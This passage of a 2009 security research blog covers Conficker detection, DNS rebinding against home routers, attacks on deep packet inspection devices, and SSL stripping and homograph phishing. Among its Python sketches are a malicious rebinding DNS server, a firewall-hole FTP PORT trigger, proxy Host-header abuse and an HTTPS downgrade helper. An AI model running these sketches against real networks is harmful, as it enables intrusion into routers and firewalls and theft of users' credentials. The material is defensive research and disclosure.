Taming Conficker, The Easy Way

March 30, 2009 4 comments

We may not know what the Conficker authors have in store for us on April 1st, but I doubt many network administrators want to find out.  Maybe they don’t have to:  I’ve been working with the Honeynet Project’s Tillmann Werner and Felix Leder, who have been digging into Conficker’s profile on the network.  What we’ve found is pretty cool:  Conficker actually changes what Windows looks like on the network, and this change can be detected remotely, anonymously, and very, very quickly.  You can literally ask a server if it’s infected with Conficker, and it will tell you.  Tillmann and Felix have their own proof-of-concept scanner, and with the help of Securosis’ Rich Mogull and the multivendor Conficker Working Group, enterprise-class scanners should already be out from Tenable (Nessus), McAfee/Foundstone, nmap, nCircle, and Qualys.

We figured this out on Friday, and got code put together for Monday.  It’s been one heck of a weekend.

The technical details are not complicated — Conficker, in all its variants, makes NetpwPathCanonicalize() work quite a bit differently than either the unpatched or the patched MS08-067 version — but I’ll let Tillmann and Felix describe this in full in their “Know Your Enemy” paper, due out any day now with all sorts of interesting observations about this annoying piece of code.  (We didn’t think it made sense to hold up the scanner while finishing up a few final edits on the paper.)
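
For the curious, the shape of the check is simple even if the byte-level details belong in Tillmann and Felix’s paper: probe the service and see whose NetpwPathCanonicalize() answers. As a minimal sketch, here’s a Python wrapper that just drives a Conficker-aware nmap build (4.85BETA5 or later) with its documented safe-check arguments; the target range is a placeholder, and the output filtering is approximate since nmap’s report format varies between versions:

```python
"""Sketch: sweep a network for Conficker's altered NetpwPathCanonicalize()
behavior by driving nmap's smb-check-vulns script (needs nmap 4.85BETA5+).
This is a convenience wrapper, not the Honeynet Project scanner itself."""
import subprocess
import sys

def scan(target):
    # safe=1 restricts the script to its non-destructive checks, which
    # include the Conficker signature.
    cmd = ["nmap", "-p139,445", "--script", "smb-check-vulns",
           "--script-args", "safe=1", target]
    out = subprocess.check_output(cmd).decode("utf-8", "replace")
    # Exact wording varies across nmap versions; just surface any line
    # that mentions Conficker, plus the per-host report headers.
    for line in out.splitlines():
        if line.startswith("Nmap scan report") or "conficker" in line.lower():
            print(line)

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else "192.168.1.0/24")
```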

Categories: Security

Infrastructure Attacks: A Growing Concern

March 24, 2009 1 comment

So the general theme of my talks for the last year has been about the extraordinary damage that infrastructure attacks are capable of. I do believe it’s possible to bolster endpoint security — to achieve end-to-end trust — but it will take more than what we’re doing right now. It will take, somewhat to my surprise, DNSSEC.

It will also take treating infrastructure itself with more care, and more security due diligence, than we do today. Forget patching infrastructure: when my DNS bug hit, a remarkable number of sites suddenly found themselves struggling simply to identify the DNS servers they were dependent on. We can do better. We need better operational awareness of our infrastructure. And we need infrastructure, over time, to become a lot safer and easier to update. That means automatic update isn’t just for desktops anymore; that firmware patches need a much higher likelihood of not bricking the hardware; and, possibly, that we need fewer builds with more testing for a production environment that is increasingly under attack.

The reality is the bad guys are out there, and they’re learning.  Just as attackers moved from servers to clients, some are moving from compromising a single client to compromising every client behind vulnerable infrastructure.  Psyb0t, a worm that has been bouncing around since January, was recently found by DroneBL and reported on by Ryan Naraine.  It targets home routers, and early estimates are that it has hit over 100K of them.  Home routers are a wonderful, enabling technology for users, and even for security:  they carried us through the years of widespread server-side vulnerabilities from 2001 to 2004.  So we shouldn’t be too down on them.  But they do have vulnerabilities, and they are getting exposed.

This, of course, is something quite a few people have been talking about.  CSRF — Cross Site Request Forgery — attacks have affected everyone from Linksys to Motorola to Siemens to Cisco.  More problematically, the DNS Rebinding attacks discussed by myself, David Byrne, Dan Boneh/Adam Barth/Collin Jackson, and others in 2007 still affect home routers. And I’m not talking about Java and Flash sockets, like at this year’s CanSecWest talk.  I’m talking about simply running rebinding against the browser itself, to make a remote website and a local router appear to be the same name, thus able to script against one another.
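
To make the rebinding half of that concrete, here is a minimal sketch of the malicious authoritative server, written against the Python dnslib package; the hostnames and addresses are placeholders, and the real attack wraps this in a page that simply re-requests its own origin once the one-second TTL has expired:

```python
"""Minimal DNS rebinding sketch (assumes the `dnslib` package): answer the
first lookup of a throwaway name with the attacker's public address, and
every later lookup with the victim's router address, using a 1-second TTL
so the browser re-resolves while the page is still loaded."""
from dnslib import RR
from dnslib.server import DNSServer, BaseResolver

PUBLIC_IP = "203.0.113.10"   # where the attacker's page is actually served
REBIND_IP = "192.168.1.1"    # a typical home router address

class RebindResolver(BaseResolver):
    def __init__(self):
        self.seen = set()

    def resolve(self, request, handler):
        qname = str(request.q.qname)
        # First query gets the real server so the page loads; afterwards the
        # same hostname resolves to the router, so as far as the Same Origin
        # Policy is concerned, the page is now talking to itself.
        ip = PUBLIC_IP if qname not in self.seen else REBIND_IP
        self.seen.add(qname)
        reply = request.reply()
        reply.add_answer(*RR.fromZone("%s 1 A %s" % (qname, ip)))
        return reply

if __name__ == "__main__":
    # Must be delegated the zone being rebound; needs privileges for UDP/53.
    DNSServer(RebindResolver(), port=53, address="0.0.0.0").start()
```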

This should sound familiar, because this is what I discussed at RSA last year.

Yep, that still works, in all browsers. It has to. Moral of the video: please don’t have a default password on your home router — and, maybe, home routers should someday only allow default passwords to work for 10 minutes after a power cycle.

Why can’t this be fixed in the browser? Now that’s a fascinating question, which we’ll discuss in another blog post.

Categories: Security

Cansec Slides, Now With More TCP NAT2NAT Goodness

March 21, 2009 Leave a comment

Slides from Cansec, replete with TCP NAT2NAT goodness.

(In my defense, this trick is way less hideous than my 2001 IP TTL game!)

Staring Into The Abyss

Categories: Security

Staring Into The Abyss, A Bit Before Cansec

March 9, 2009 1 comment

I’m just going to come out and say it:  I miss packet craft.  Sure, we can always pull out Scapy, and slap amusing packets together, but everything interesting is always at the other layers.

Or is it?

For CanSecWest this year, I thought it’d be interesting to take a look at the realm of Deep Packet Inspectors. It turns out we were doing a lot of this around 2000 through 2002, and then…well, sort of stopped.  So, in this year’s CanSecWest paper, “Staring Into The Abyss:  Revisiting Browser v. Middleware Attacks In The Era Of Deep Packet Inspection” (DOC, PDF), I’m taking another crack at the realm — and I’m seeing really interesting capabilities to fingerprint, bypass, and otherwise manipulate systems that watch from the middle of networks, using protocol emulation abilities that have been part of browsers and their plugin ecosystem from the very beginning.

Ah, but here’s where I need some help.  I’ve worked pretty closely with Robert Auger from Paypal, who just published his own paper, “Socket Capable Browser Plugins Result In Transparent Proxy Abuse”.  We independently discovered the HTTP component of this attack pattern, and as I describe in my paper, we’ve kind of forgotten just how much can be done against Active FTP Application Layer Gateways.

So, if I may ask, take a look, check out my paper, and if you have some thoughts, corrections, or interesting techniques, let me know so I can integrate them into my CanSecWest presentation.  Here’s the full summary, to whet your appetite:

DPI — Deep Packet Inspection — technology is driving large amounts of intelligence into the infrastructure, parsing more and more context from data flows going past. Though this work may be necessary to support important business and even security requirements, we know from the history of security that to parse data is to potentially be vulnerable to that data – especially when the parser is designed to extract context as quickly as possible. Indeed, companies such as BreakingPoint and Codenomicon have made their names building test tools to expose potential faults with DPI engines. But could anyone actually trigger these vulnerabilities? In this paper, we restart an old line of research from several years ago: The use of in-browser technologies to “tweak” Deep Packet Inspection systems.

Essentially, by controlling both endpoints surrounding a DPI system, possibly using the TCP (and sometimes UDP) socket code that plugins add to browsers, what behavior can we extract? We find three lines of attack worth noting.

First, firewalls and NATs — the most widely deployed packet inspectors on the Internet today — can still be made to open firewall holes to the Internet by having the browser trigger the Application Layer Gateway (ALG) for protocols like Active FTP. We extend older work by integrating mechanisms for acquiring the correct internal IP address of a client, which is necessary for triggering many inspection engines; we survey other protocols, such as SIP and H.323, that have their own inspection engines; and we explore better strategies for triggering these vulnerabilities without socket engines from browser plugins. We also explore a potentially new mechanism, “Window Dribbling”, that allows an HTTP POST from a browser to be converted into a full bidirectional conversation by only allowing a remote sender to “dribble” a fixed number of bytes per segment.
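
To give a flavor of what the inspection engine actually sees, here is the Active FTP trigger reduced to raw sockets; in the paper the same bytes come from a plugin’s socket inside the browser, and every address and port below is a placeholder:

```python
"""Sketch of the Active FTP ALG trigger described above: a client behind a
firewall speaks just enough FTP toward an outside "server" on port 21 that
a stateful inspection engine sees a PORT command and opens the named
inbound port. All hosts and ports are illustrative."""
import socket

ATTACKER = "203.0.113.10"      # outside host the victim's socket connects to
INTERNAL_IP = "192.168.1.23"   # the client's own RFC 1918 address (the paper
                               # covers ways a page can learn this)
EXPOSE_PORT = 6000             # inbound port we want the ALG to open

def port_argument(ip, port):
    # FTP's PORT command encodes the port as two decimal bytes: p1*256 + p2.
    return "%s,%d,%d" % (ip.replace(".", ","), port // 256, port % 256)

def trigger():
    s = socket.create_connection((ATTACKER, 21))
    s.recv(1024)                                   # "220" banner
    s.sendall(b"USER anonymous\r\n"); s.recv(1024)
    s.sendall(b"PASS guest\r\n");     s.recv(1024)
    # An ALG watching this flow parses the PORT command and, on many
    # stateful devices, will now forward ATTACKER -> INTERNAL_IP:EXPOSE_PORT.
    s.sendall(("PORT %s\r\n" % port_argument(INTERNAL_IP, EXPOSE_PORT)).encode())
    print(s.recv(1024))
    s.close()

if __name__ == "__main__":
    trigger()
```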

Second, we (along with Robert Auger at Paypal) find that transparent HTTP proxies, such as Squid, will “override” the intended destination of browser sockets, allowing a remote attacker to send and receive data from arbitrary web sites. This allows (at minimum) extensive and expensive click fraud attacks, and may expose internal connectivity as well (HTTP or even TCP).
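
The proxy abuse, in turn, fits in a handful of lines: the socket goes to one address, the Host header claims another, and a transparent proxy that keys on the header fetches the claimed site on the victim’s behalf. A sketch (hostnames are placeholders):

```python
"""Sketch of the transparent proxy abuse described above. A raw HTTP request
is sent to one host while the Host header names another; an intercepting
proxy that routes on the header, rather than the socket's real destination,
will fetch the named site instead."""
import socket

def cross_host_fetch(connect_to, claimed_host, path="/"):
    s = socket.create_connection((connect_to, 80))
    request = ("GET %s HTTP/1.1\r\n"
               "Host: %s\r\n"             # what the proxy may route on
               "Connection: close\r\n"
               "\r\n") % (path, claimed_host)
    s.sendall(request.encode())
    chunks = []
    while True:
        data = s.recv(4096)
        if not data:
            break
        chunks.append(data)
    s.close()
    return b"".join(chunks)

if __name__ == "__main__":
    # The socket goes to the attacker's own server; the Host header does not.
    print(cross_host_fetch("203.0.113.10", "www.example.com")[:300])
```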

Third, and most interestingly, we find that active DPIs — those that actually alter the flow of traffic between a client and a server — all seem to expose subtly different parsers and handlers for the protocols they manipulate. These variations in behavior can be remotely fingerprinted, allowing an attacker to identify DPI platforms so as to correctly target his attacks. This capability, understood particularly in light of Felix Lindner’s recent work on generic attacks against Cisco infrastructure, underscores the need both for DPI vendors to test their platforms extensively, and for IT managers to deploy critical infrastructure patches with at least as much vigor as desktop support receives today.
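
As a rough illustration of how that fingerprinting works, assume you control a server on the far side of the device that simply echoes back whatever bytes actually arrived; the probe set below is illustrative, and the interesting signal is which probes get rewritten, normalized, or silently dropped in transit:

```python
"""Sketch of behavioral DPI fingerprinting: send protocol probe variants
through the path to a cooperating echo server and diff what arrives against
what was sent. The pattern of rewrites forms the middlebox's signature."""
import socket

PROBES = [
    b"PORT 192,168,1,23,23,112\r\n",       # well-formed Active FTP PORT
    b"PORT 192,168,1,23,23,112 \r\n",      # trailing space: normalized or not?
    b"port 192,168,1,23,23,112\r\n",       # lowercase verb
    b"PORT 192,168,001,023,23,112\r\n",    # zero-padded octets
]

def fingerprint(echo_server, port=21):
    signature = []
    for probe in PROBES:
        s = socket.create_connection((echo_server, port))
        s.recv(1024)            # banner from our own echo server
        s.sendall(probe)
        seen = s.recv(4096)     # echo server returns exactly what it received
        s.close()
        signature.append((probe, seen))
    return signature

if __name__ == "__main__":
    for sent, seen in fingerprint("203.0.113.10"):
        status = "unmodified" if seen.strip() == sent.strip() else "REWRITTEN"
        print(status, sent, seen)
```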

For remediation purposes, we recommend two lines of defense – one policy, one technical. As a matter of policy, we find the most important recommendation of this paper to be that industry reconsider patching policies as they apply to infrastructure, especially as that infrastructure starts inspecting traffic at ever higher speeds in ever deeper ways. We are actively concerned that administrators have internalized the need to patch endpoints, but aren’t closely tracking the equipment that binds endpoints together – despite its ever-increasing intelligence. This is as much a recommendation to vendors – to build patches quickly, and to code audit and fuzz with software from companies like BreakingPoint and Codenomicon – as it is a plea to IT departments to deploy the patches that are generated. Also from a policy perspective, while this paper does recognize the need for judicious use of DPI technology, systems that are deployed across organizational boundaries have a particular need for correctness. There have been incidents in the past that have led to security vulnerability across entire ISPs.

On the technical front, we defend the existence of socket functionality in the browser, recognizing that constraining all networking to that which existed in 2001 is not leading to more stable or more secure networks. We explore a solution that potentially allows firewalls to integrate socket policies into their ALGs, encouraging plugin developers to eventually join in with browser manufacturers and build a single, coherent, cross-domain communication standard. We also discuss more advanced transparent proxy caching policies, which will prevent the Same Origin Policy bypasses discussed above. Finally, we remind home router developers that browsers are still able to access their web interfaces from the Internet, and that this exposure can be repaired by tying default password effectiveness to either a button on the device or a power cycle.

The firewall fingerprinter should be online shortly, with source code for you to play with as well.  Thanks!

(Incidentally, yep, Source is this week, and I have something rather different in store for that event.  The times, they are busy.)

Categories: Security

Virtual Hoff

February 28, 2009 Leave a comment

So Crystal and the rest of Workhabit just threw another Unconference:  Cloudcamp Seattle.  I’m actually pretty impressed with the crowd — there’s representation from Amazon EC2, Windows Azure, and RightScale (who, non-ironically, have actually implemented Cloud on Cloud).  Crystal asked if I’d be willing to do a Cloud Security talk.  The Man couldn’t fly out, but here are my thoughts on the cloud.  Quick summary:  There are ugly engineering (and procedural) issues we can’t actually ignore, mainly around escaping the management layer and the problem of intrusion disclosure, but:

a) This is such a superior way to deploy software that I expect to see the necessary modifications to hardware and authentication technologies so as to obviate the threats in this deck, and
b) Private clouds are such an obvious value add that they’ll carry us through until the modifications are implemented.

I’ll throw video on as well if people want.  Enjoy!

When Irresistible Forces Attack

Categories: Security

Black Hat Federal slides

February 20, 2009 2 comments

I’ll write more detailed commentary later, but here are the slides I recently presented at Black Hat.

2008 And The New (Old) Nature Of Critical Infrastructure

Categories: Security

Leetness Not Actually Required For Pwnage

February 19, 2009 23 comments

I do need to make a post about DNSSEC at some point in the near future.  But for now, I’d like to deal with the more immediate issue:  Moxie’s SSL break.

You’ll note that’s not in quotes.  There’s a pretty decent temptation to say Moxie’s attacks don’t “count”.  Some of this comes from the fact that at the end of the day, these are his three attacks:

First, that when a site attempts to upgrade from HTTP to HTTPS, he can suppress the upgrade — possibly throwing in a “Lock” favicon which might trick the user.
Second, that there are a surprising number of online banks that still place an HTTPS form on an HTTP page, which can of course be downgraded (or, as I pointed out, sniffed via injected Javascript).
Finally, Firefox’s (not IE’s) defenses against Eric Johanson’s IDN vulnerability could be bypassed by registering a domain and acquiring a wildcard cert in .cn.

The first two attacks have been discussed fairly extensively, while the third works in only one of the browsers.  So there’s some grumbling.  Let’s talk about that.

When I gave my DNS Cache Poisoning talk last year, I devoted quite a few slides to the failings of SSL.  To put it simply, there’s a reason I didn’t consider SSL a sufficient defense for DNS Cache Poisoning. Indeed, the fact that the 302 Redirect could be replaced with a 200 OK — replacing https://www.paypal.com with http://www.paypal.com — is right there on the first slide.  (His favicon trick is neat though.)  And a few slides later, I ended up quoting my 2006 talk with respect to online banks and their tragic use of weak security forms, replete with cutesy “lock” icons.  Obviously I didn’t discover either of these attacks; they, and the rest of the litany of weaknesses described in my 2008 deck, have long been the sort of failings in SSL that we’ve all known are pretty deeply problematic.
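
For readers who haven’t watched this happen, the downgrade really is that mechanical. Here’s a toy sketch of the two rewrites involved (the helper and its use of urllib are my own illustration, not Moxie’s code):

```python
"""Toy illustration of HTTPS stripping: an attacker already in the plain-HTTP
path swallows the redirect to HTTPS, fetches the secure page himself, and
rewrites any https:// links so later clicks also stay on HTTP."""
import urllib.request

def fetch_over_https(url):
    # The attacker can speak HTTPS to the real site just fine; only the
    # victim's leg of the conversation is left unencrypted.
    return urllib.request.urlopen(url).read().decode("utf-8", "replace")

def downgrade(status_line, headers, body):
    location = headers.get("Location", "")
    if location.startswith("https://"):
        # The 302 toward HTTPS never reaches the user: answer the original
        # plain-HTTP request with a 200 OK carrying the secure page's content.
        status_line = "HTTP/1.1 200 OK"
        body = fetch_over_https(location)
        headers.pop("Location")
    # Quietly rewrite any remaining https:// links in the page.
    return status_line, headers, body.replace("https://", "http://")
```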

But, at least the way I look at it, Moxie’s talk wasn’t about some “l33t new protocol flaw” in SSL.  He’s traveled that ground — in 2002, his finding that a certificate for http://www.badguy.com could sign another certificate for http://www.bank.com via the non-enforcement of Basic Constraints is about as “l33t” as it gets.  That’s been fixed for years though.  This was instead a fairly searing critique of Security UI.  Moxie introduced (to me anyway) the concept of Positive vs. Negative Feedback.  Negative Feedback systems occur when the browser detects an out-and-out failure in the cryptography, and presents an error to the user.  In response to the New Zealand bank data, in which 199 of 200 users ignored a negative prompt, browsers have been getting crazier and crazier about forcing users to jump through hoops in order to bypass a certificate error.  The new negative errors are at the point where it is in fact easier to “balk” — to stop a web transaction, and move on to something else.

So Moxie’s putting his energy into the old positive feedback attacks — simply disabling the security, and seeing if anyone notices.  And here he shows up with some pretty astonishing data:  Nobody noticed.  To be specific, absolutely 0% of users who were presented with missing encryption on important web sites, while being asked to provide sensitive financial data to those sites, refused on the basis of the missing security.

Wow.  0%.  Seriously.

Why don’t users “get it”?

The most heartbreaking thing, I think, in Moxie’s entire deck is where he shows off what his attack does to Paypal, on an older browser.  Paypal, more than most sites, has some paranoid, whip-smart engineers who really want to ship the most secure web experience possible for their service.  As such, they have what’s probably the single most widely deployed SSL-only site.  100% of Paypal can, and must, be retrieved over SSL.

Unless there’s a bad guy in the way, faking the real Paypal content over HTTP.  Then Paypal looks just like your bank.

That the insecurity of other sites would train users not to expect security on yours was pretty cool (if sad) to see.

Where I do think things went a little off the tracks was when Moxie talked about his (pretty elegant) extension of Eric Johanson’s IDN attacks.  IDNs, or Internationalized Domain Names, exist to allow other languages the ability to have web sites in their native character sets, rather than shunting everything into ASCII.  What Eric did in 2005 was show that he could acquire a certificate for http://www.paypal.com — with the “a” being the Cyrillic “а” — and thus acquire the “lock”, apparently attached to a near-pixel-perfect rendering of Paypal’s address bar.  These so-called “Homograph” attacks were dealt with by locking down the rendering of other character sets in the address bar.
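
A quick way to see why this fooled both eyeballs and certificate issuance: to DNS, and to the CA validating the name, the lookalike is just another ASCII label. A short sketch (the domain is illustrative, with the first “a” of “paypal” swapped for Cyrillic U+0430):

```python
"""Homograph sketch: what the user sees versus what goes on the wire.
The built-in "idna" codec converts the lookalike name to its xn-- form."""
lookalike = "www.pаypal.com"       # first 'a' is U+0430, CYRILLIC SMALL LETTER A
print(lookalike)                   # renders almost exactly like the real thing
print(lookalike.encode("idna"))    # the punycode label DNS and the CA actually see
```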

The problem — and it’s worth exploring, because it reflects just how tricky it is to satisfy all those other demands besides security — is that the trivial way to lock down the address bar (simply banning Chinese and Cyrillic and everything else) has some pretty serious geopolitical implications.  What, America gets to have its domain names, and China doesn’t?  What’s up with that?  Different browsers have dealt with this problem in different ways.  I believe the way IE has handled this is to ask the operating system what language the OS is in, and allow Chinese browsers to view Chinese characters, Russian browsers to view Cyrillic characters, and so on.  It appears Firefox handled this instead by saying that domains in *.cn may contain Chinese characters, domains in *.ru may contain Cyrillic characters, and so on.

But nothing stops Moxie, an American, from registering a *.cn domain, acquiring a *.ijjk.cn certificate, and using the Chinese character that looks exactly like a slash to make a fake http://www.bankofwhatever.com/foo/bar/foo.ijjk.cn domain.  It’s a cute trick.

It’s also precisely what EV certificates exist to solve.

There’s an amazing amount of confusion around Extended Validation — EV.  I can’t claim innocence here; I myself was pretty clueless about why they exist until fairly recently.  Here’s the deal:  Forget crazy tricks with Chinese characters — bad guys have been registering names along the lines of http://www.bank-of-whatever.com or http://www.bankofwhateverinc.com or http://www.bankofamerica.com.xyzy.com for years, and then acquiring certificates for those names.  Moxie’s attack is neat, but once you hit the semantic space, there’s practically an unlimited number of potential namespace collisions. EV exists, pretty much exclusively, to deal with the problem of these semantic collisions.  It does four things:

1) It requires a solid certificate chain, as opposed to one containing MD5.
2) It requires a human lawyer, versed in the laws and language of a particular jurisdiction, to determine the implied corporate relationship from the domain name and declare it valid.
3) It applies a green background to the entire address bar (IE) or to the leftmost side of it (Firefox), increasing the amount of “positive feedback” (as Moxie puts it) that users will, it is hoped, come to demand.
4) It explicitly inserts the human-lawyer-approved brand identity into the address bar, replete with a jurisdictional declaration.  This is also there to add more positive feedback.

That’s what EV is for. It’s not at all there to deal with domain-validated certs for http://www.bankofwhatever.com being incorrectly issued — see Adam Barth and Collin Jackson’s work in their paper, “Beware of Finer Grained Origins”. It’s not at all, as Moxie said in his talk, “Just the validation that CA’s should have been doing already”.  Verisign et al have built an extensive new positive feedback layer to deal with real-world phishing attacks that, while not as elegant as Moxie’s Chinese Slash, were no less effective.

The real question, in the wake of Moxie’s work, is whether we have data showing that users notice the missing green bar and the missing brand identity.  Or, even with EV sites, do users still ignore the missing security markings?  I’m looking forward to seeing the data.

Categories: Security